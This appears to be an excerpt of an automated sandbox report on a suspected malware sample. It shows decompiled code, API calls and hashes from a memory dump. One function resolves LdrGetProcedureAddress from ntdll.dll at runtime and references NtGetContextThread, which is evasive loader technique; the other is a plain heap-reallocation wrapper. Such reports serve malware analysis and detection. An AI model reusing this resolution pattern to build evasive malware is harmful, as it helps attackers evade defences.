                                                                                                        			E014621A0(void* __ecx, signed int __edx, char _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                        				long _v8;
                                                                                                        				signed int _v16;
                                                                                                        				void* _v20;
                                                                                                        				signed int _v32;
                                                                                                        				intOrPtr _v36;
                                                                                                        				intOrPtr _v40;
                                                                                                        				char _v44;
                                                                                                        				signed int _t22;
                                                                                                        				void* _t24;
                                                                                                        				short _t27;
                                                                                                        				void* _t31;
                                                                                                        				signed int _t37;
                                                                                                        				signed int _t38;
                                                                                                        				void _t40;
                                                                                                        				signed int _t46;
                                                                                                        				void* _t52;
                                                                                                        				intOrPtr _t57;
                                                                                                        				void* _t61;
                                                                                                        				void* _t62;
                                                                                                        
                                                                                                        				_t46 = __edx;
                                                                                                        				_t22 =  *0x1631128; // 0x0
                                                                                                        				_t62 = _t61 - 0x28;
                                                                                                        				_t64 = _t22 |  *0x163112c;
                                                                                                        				if((_t22 |  *0x163112c) != 0) {
                                                                                                        					L3:
                                                                                                        					_t24 = VirtualAlloc(0, 0x120, 0x3000, 4); // 0x120 bytes, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE
                                                                                                        					_t52 = _t24;
                                                                                                        					__eflags = _t52;
                                                                                                        					if(_t52 != 0) {
                                                                                                        						_t2 = _t52 + 0x18; // 0x18
                                                                                                        						_t57 = _t2;
                                                                                                        						E014617E0(_t57, _a12);
                                                                                                        						asm("cdq");
                                                                                                        						 *((intOrPtr*)(_t52 + 0x10)) = _t57;
                                                                                                        						 *(_t52 + 0x14) = _t46;
                                                                                                        						_t27 = E01461850(_t57);
                                                                                                        						asm("xorps xmm0, xmm0");
                                                                                                        						 *((short*)(_t52 + 8)) = _t27;
                                                                                                        						 *((short*)(_t52 + 0xa)) = _t27;
                                                                                                        						_t8 = _t52 + 8; // 0x8
                                                                                                        						 *_t52 = 0;
                                                                                                        						 *(_t52 + 4) = 0;
                                                                                                        						asm("cdq");
                                                                                                        						_v36 = _t8;
                                                                                                        						_v32 = _t46;
                                                                                                        						asm("cdq");
                                                                                                        						_v20 = _t52;
                                                                                                        						_v44 = _a4;
                                                                                                        						_v40 = _a8;
                                                                                                        						asm("movlpd [ebp-0x18], xmm0");
                                                                                                        						_v16 = _t46;
                                                                                                        						_t31 = E01461D10( *0x1631128,  *0x163112c,  &_v44, 4);
                                                                                                        						_t40 =  *_t52;
                                                                                                        						_v8 = 0;
                                                                                                        						_v8 =  *(_t52 + 4);
                                                                                                        						VirtualFree(_t52, 0, 0x8000);
                                                                                                        						__eflags = _t31;
                                                                                                        						if(_t31 < 0) {
                                                                                                        							__eflags = 0;
                                                                                                        							return 0;
                                                                                                        						} else {
                                                                                                        							return _t40;
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						__eflags = 0;
                                                                                                        						return _t24;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					_t37 = E014622B0(_t46, E01461E50(__ecx, __edx, _t64, "ntdll.dll"), _t46, "LdrGetProcedureAddress");
                                                                                                        					_t62 = _t62 + 0x10;
                                                                                                        					 *0x1631128 = _t37;
                                                                                                        					_t38 = _t37 | _t46;
                                                                                                        					 *0x163112c = _t46;
                                                                                                        					if(_t38 != 0) {
                                                                                                        						goto L3;
                                                                                                        					} else {
                                                                                                        						return _t38;
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}

                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000120,00003000,00000004,?,?,?,?,?,01466208,?,?,NtGetContextThread,?,?,?), ref: 014621F0
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,01466208,?), ref: 0146228F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Virtual$AllocFree
                                                                                                        • String ID: LdrGetProcedureAddress$ntdll.dll
                                                                                                        • API String ID: 2087232378-1174695804
                                                                                                        • Opcode ID: daba9033c1c6b6da970b6c987b142297e7b2ddcdd71bf2de8280dbaabaad92e9
                                                                                                        • Instruction ID: 3c8c92d7c4df8c16199c720faf1d97d1685a5a2e3d64bb7337b1d378b0c57dcf
                                                                                                        • Opcode Fuzzy Hash: daba9033c1c6b6da970b6c987b142297e7b2ddcdd71bf2de8280dbaabaad92e9
                                                                                                        • Instruction Fuzzy Hash: 1431C475E01205ABD710DF69DC41BAAF7B9FF89718F10821BE908A3210E7B1A9218BD5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E014616A0(void* _a4, long _a8) {
                                                                                                        				long _t5;
                                                                                                        				long _t9;
                                                                                                        
                                                                                                        				_t5 = HeapReAlloc(GetProcessHeap(), 0, _a4, _a8);
                                                                                                        				_t9 = _t5;
                                                                                                        				if(_t9 == 0) {
                                                                                                        					HeapFree(GetProcessHeap(), _t5, _a4);
                                                                                                        					return _t9;
                                                                                                        				}
                                                                                                        				return _t5;
                                                                                                        			}

                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,01464D23,00000000,?,01464D23,00000000,00000000), ref: 014616AC
                                                                                                        • HeapReAlloc.KERNEL32(00000000,?,01464D23,00000000,00000000), ref: 014616B3
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,01464D23,00000000,00000000), ref: 014616C3
                                                                                                        • HeapFree.KERNEL32(00000000,?,01464D23,00000000,00000000), ref: 014616CA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$Process$AllocFree
                                                                                                        • String ID:
                                                                                                        • API String ID: 756756679-0
                                                                                                        • Opcode ID: 6893effa246182f2bbd1a4a9b1e4977c9586002687244fbde1ea6ea86fb3d93e
                                                                                                        • Instruction ID: 830a00b03f24c42d2e95054154c98c400c49bc2beec7d99f8726482747bfbc3e
                                                                                                        • Opcode Fuzzy Hash: 6893effa246182f2bbd1a4a9b1e4977c9586002687244fbde1ea6ea86fb3d93e
                                                                                                        • Instruction Fuzzy Hash: 8CE0B6B6904214BBCB221AE5E80CA9A3E2DAB086AAB044015FA0D86234C67189208B92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%